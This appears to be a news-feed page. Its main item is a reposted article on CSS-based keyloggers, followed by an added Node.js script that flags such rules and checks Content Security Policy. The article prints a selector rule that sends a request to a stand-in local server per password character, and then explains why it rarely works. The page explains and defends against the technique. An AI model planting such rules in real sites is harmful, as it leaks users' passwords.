I don’t understand Graph Theory.

emrox
3 days ago
Hamburg, Germany

CSS Keylogger (and why you shouldn’t worry about it)

By leveraging CSS attribute selectors it is, in theory, possible to write a pure CSS keylogger. The selector below, for example, targets all password inputs whose value ends with the character a:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

The theory goes that whenever a user presses the a character inside an input[type="password"], a request to http://localhost:3000/a will be made, thus leaving a breadcrumb trail in some server log for an admin to snoop. Duplicate the selector above for all possible characters, and you’ll see the password appear in your server logs per keystroke.

I see many people on Twitter freaking out because of this (what if it’s in a WordPress Theme you’ve installed?!), yet I don’t really worry about it as in practice this doesn’t work at all (tested with latest Firefox and Chrome on macOS):

  1. It only works with an initial value being set on an input, and not per key press nor after blurring the field.
  2. (Following up on 1) It will only catch the last character of a password when it’s being prefilled in the value attribute.
  3. It’s not triggered for values that have been autocompleted by the browser’s credentials manager / your password manager of choice.
  4. It can’t handle repeat characters, as the browser won’t re-request the background image in that case.

On top of that, you can easily prevent it by setting a proper Content Security Policy.

As you were soldiers, carry on …
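
An added example, not part of the original post: a small Node.js audit that flags stylesheet rules of the kind shown above (a selector matching on an input's value attribute combined with a url() fetch) and checks whether a given Content Security Policy would block the resulting image request. The page origin https://shop.example, the sample stylesheet and both function names are assumptions for illustration; the CSP check is simplified to img-src/default-src with *, 'self' and exact origins.

```javascript
// Constructed sample stylesheet; the second rule is the selector from the article.
const SAMPLE_CSS = `
input[type="text"] { border: 1px solid #ccc; }
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
.logo { background: url(/img/logo.png); }
input[value^='x'], .note { color: red; }
`;

// Matches [value=..], [value$=..], [value^=..], [value*=..], [value~=..], [value|=..]
const VALUE_SELECTOR = /\[\s*value\s*[$^*~|]?=/i;
const URL_FN = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;

// Report rules that key on an input's value attribute AND fetch a URL (regex split, not a full CSS parser).
function findValueExfilRules(css, pageOrigin) {
  const findings = [];
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  for (const [, selector, body] of stripped.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const [, , raw] of body.matchAll(URL_FN)) {
      if (/^data:/i.test(raw)) continue; // inline data, no network request
      const target = new URL(raw, pageOrigin);
      findings.push({
        selector: selector.trim(),
        url: target.href,
        crossOrigin: target.origin !== new URL(pageOrigin).origin,
      });
    }
  }
  return findings;
}

// Would this CSP let the page load `url` as an image (img-src, else default-src)?
// Simplification: understands only *, 'self' and exact origins as sources.
function cspAllowsImage(policy, url, pageOrigin) {
  const directives = Object.fromEntries(policy.split(";")
    .map((d) => d.trim().split(/\s+/)).filter((parts) => parts[0])
    .map(([name, ...sources]) => [name.toLowerCase(), sources]));
  const sources = directives["img-src"] ?? directives["default-src"];
  if (!sources) return true; // no applicable directive: nothing restricts the fetch
  const origin = new URL(url).origin;
  return sources.some((s) => s === "*" || s === origin ||
    (s === "'self'" && origin === new URL(pageOrigin).origin));
}

const PAGE = "https://shop.example"; // hypothetical page origin
for (const f of findValueExfilRules(SAMPLE_CSS, PAGE))
  console.log(f.selector, "->", f.url, "| allowed:", cspAllowsImage("default-src 'self'", f.url, PAGE));
```

Only the rule from the article is reported for the sample input, and a policy of default-src 'self' does not allow its request.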

emrox
4 days ago
Hamburg, Germany

Double Shot #2038

emrox
4 days ago
'Running a modern infrastructure on Kubernetes' sounds interesting
Hamburg, Germany
alvinashcraft
4 days ago
West Grove, PA

Handling Phone Numbers: Best Practices for Developers (2015)

emrox
5 days ago
Hamburg, Germany

Why OpenStreetMap is in Serious Trouble

tante
8 days ago
In-Depth analysis of the problems OpenStreetMap needs to address to stay relevant.

This is crucial: There needs to be open and free geo data.
Oldenburg/Germany
emrox
6 days ago
Hamburg, Germany
JimB
6 days ago
Very sad but true. The difficulty of search, the single layer, the lack of consistency in adding or editing any feature strike chords. I'd add the plethora of notes from people with good intentions who can't or won't edit, that end up obscuring otherwise valid information.

The method JIT compiler for Ruby 2.6

emrox
6 days ago
Hamburg, Germany